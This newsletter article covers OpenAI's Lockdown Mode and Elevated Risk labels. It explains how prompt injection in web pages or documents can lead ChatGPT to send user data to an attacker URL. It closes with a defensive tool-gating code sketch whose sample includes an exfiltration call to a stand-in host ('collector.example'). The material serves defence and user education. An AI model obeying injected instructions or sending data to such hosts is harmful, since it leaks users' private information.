Vol. 1 · Edition 023 · Free · No paywall

Everyone Needs a Samwise

AI news · Synthesized · Opinionated · 🌿

Lockdown Mode is not intended for everyone.

OpenAI — June 6, 2026

Safety
By Sam Taylor with Samwise

On what Lockdown Mode actually cuts, who it's for, and why the warning labels on Agent Mode and Codex tell you something about where OpenAI thinks the real risk sits.

OpenAI labeled its own riskiest features 'Elevated Risk.' That admission matters more than the kill switch.

Source lean on this story (Anti-AI to Pro-AI): Anti-AI 00 · Skeptic 01 · Neutral 02 · Pro (practical) 02 · Pro (hyped) 00

If you use ChatGPT for anything where the answers actually matter — work, research, anything involving your personal data — there's a new security setting you should probably know about. OpenAI shipped Lockdown Mode on June 6, 2026, and unlike most AI security features, this one is available to every account, free through Business. You'll find it at Settings > Security.

What it does: disables the features that could theoretically be used against you. Agent Mode, Deep Research, live web browsing, Canvas networking, file downloads — all of it turns off. The model keeps answering questions from a sealed room.

But the Lockdown Mode toggle isn't the most interesting thing OpenAI shipped last Friday. The Elevated Risk labels that went out alongside it are.

What Lockdown Mode actually is

OpenAI's own framing: not intended for everyone; designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.

Prompt injection (what that means in plain terms): a malicious instruction hidden in a webpage, document, or message that gets passed to ChatGPT, causing it to do something you didn't ask it to do — like sending your data to an attacker-controlled URL or downloading a file from somewhere it shouldn't. Lockdown Mode doesn't stop the injection from appearing in content ChatGPT processes. It cuts the outbound channels the injection could use to actually hurt you.

Think of it like turning off the car before you park in an unfamiliar neighborhood. The lock on your data isn't unbreakable — it's just harder to exploit when the engine is off.

What gets disabled when you turn it on:

  • Live web access: limited to cached content; no live requests leave OpenAI's network
  • Agent Mode: disabled entirely
  • Deep Research (including shopping research): disabled
  • Image generation in responses: disabled
  • Canvas networking: can't approve code to access the network
  • Live connectors: disabled
  • File downloads: disabled; manual file uploads for analysis still work

ChatGPT: Normal mode vs. Lockdown Mode

| Feature | Normal | Lockdown Mode |
| --- | --- | --- |
| Live web browsing | Active | Cached content only |
| Agent Mode | Active | Disabled |
| Deep Research | Active | Disabled |
| Canvas networking | Active | Disabled |
| Image generation in replies | Active | Disabled |
| File downloads | Active | Disabled |
| Manual file uploads | Active | Still works |

The Elevated Risk labels, which are the more interesting part

Also shipped June 6: Elevated Risk labels, appearing consistently across ChatGPT, ChatGPT Atlas, and Codex on features that create "significant data exposure." Specifically named: authorizing an agent to read your email, giving Codex (OpenAI's coding agent) access to a proprietary codebase, approving autonomous actions like sending emails.

They're informational only. They don't block anything. OpenAI says the label comes off a feature once its security has improved enough to no longer warrant the warning.

That last sentence is the interesting part. OpenAI is publicly acknowledging that these features, as they exist today, carry risk they haven't fully fixed. That's both a security posture and a roadmap commitment — the label goes away when the actual fix ships, which creates a public test.

Elevated Risk warnings will appear on specific ChatGPT features that create significant data exposure.

OpenAI — June 6, 2026

What's real vs. what deserves a side-eye

What's real:

  • The threat model is correct. Prompt injection via web content is a real attack vector. Cutting outbound network channels is a meaningful mitigation.
  • Available free. Every account gets the toggle. No upgrade required.
  • Elevated Risk labels are the most transparent OpenAI has been about which features carry unmitigated risk. That's a real step, even if it's imperfect.
  • The label-removal commitment creates public accountability: either the fixes ship and labels disappear, or labels accumulate and you know the fixes aren't coming.

What deserves a side-eye:

  • Lockdown Mode doesn't stop the injection from appearing. If malicious instructions are in a document you feed to ChatGPT, the model still processes them. The mode only blocks the exfiltration step. Partial defense, not a full one.
  • "Informational only" Elevated Risk labels are doing heavy lifting. The risk isn't annotated away.
  • The incentive to remove a risk label is lower than the incentive to ship the feature that earned it. Expect labels to accumulate before they get retired.

What to do about it

Whether you're a regular ChatGPT user or building on top of the API, there are a few concrete things worth doing:

  • Enable Lockdown Mode if your work is sensitive. If you're feeding ChatGPT work emails, legal documents, financial data, or anything you'd be unhappy seeing leaked, turn on Lockdown Mode. Settings > Security. It's free and reversible.
  • Notice the Elevated Risk banners when they appear. They're not blocking anything — but they're OpenAI telling you "this feature connects to your real data in ways we haven't fully secured yet." Reading that banner before clicking through is worth 10 seconds.
  • Cross-check any ChatGPT answer that came from Agent Mode or Deep Research. Both are now labeled elevated risk for a reason. For anything consequential — medical, legal, financial — treat them as starting points, not final answers.
  • If you're building on ChatGPT for work: design your workflow to handle the case where a user has Lockdown Mode enabled. Agent Mode and live web access disappear. If your integration depends on either, build a graceful fallback.
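
An added sketch of the graceful fallback suggested in the last item, for an integration that routes tool calls through its own gate. It is not from the article and not an OpenAI API: the tool names, `gate` and `run_workflow` are hypothetical, and the rules mirror the article's list of what Lockdown Mode disables.

```python
from dataclasses import dataclass

# Hypothetical tool names (assumption); rules mirror the article's list.
# This models the described behaviour and is not an OpenAI API.
LOCKDOWN_RULES = {
    "web.live": ("fallback", "web.cached"),  # cached content only
    "web.cached": ("allow", None),
    "file.upload": ("allow", None),          # manual uploads still work
    "file.download": ("deny", None),
    "agent.run": ("deny", None),
    "research.deep": ("deny", None),
    "image.generate": ("deny", None),
    "canvas.network": ("deny", None),
    "connector.live": ("deny", None),
}
# Tools the article lists as cut or restricted in Lockdown Mode.
RESTRICTED = {"web.live", "file.download", "agent.run", "research.deep",
              "image.generate", "canvas.network", "connector.live"}

@dataclass
class Decision:
    tool: str      # tool that will actually run ("" if none)
    allowed: bool
    note: str      # message the integration can surface to the user

def gate(tool: str, lockdown: bool) -> Decision:
    if not lockdown:
        return Decision(tool, True, "normal mode")
    action, alt = LOCKDOWN_RULES.get(tool, ("deny", None))  # unknown: deny
    if action == "allow":
        return Decision(tool, True, "permitted in lockdown")
    if action == "fallback":
        return Decision(alt, True, f"{tool} unavailable, using {alt}")
    return Decision("", False, f"{tool} disabled in lockdown, step skipped")

def run_workflow(steps, lockdown):
    """Run what the gate allows; collect skipped steps instead of failing."""
    ran, skipped = [], []
    for tool, arg in steps:
        d = gate(tool, lockdown)
        (ran if d.allowed else skipped).append((d.tool or tool, arg, d.note))
    return ran, skipped

# Constructed sample: the third step stands in for a tool call the model
# was steered into by instructions hidden in the uploaded document.
STEPS = [
    ("file.upload", "q3-report.pdf"),
    ("web.live", "https://example.com/pricing"),
    ("web.live", "https://collector.example/?d=REPORT_TEXT"),
    ("agent.run", "email the summary"),
]
```

With `lockdown=True` the hidden instruction has still been read, but the live request it asked for is rewritten to a cached lookup and the agent step is reported as skipped rather than crashing the workflow.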
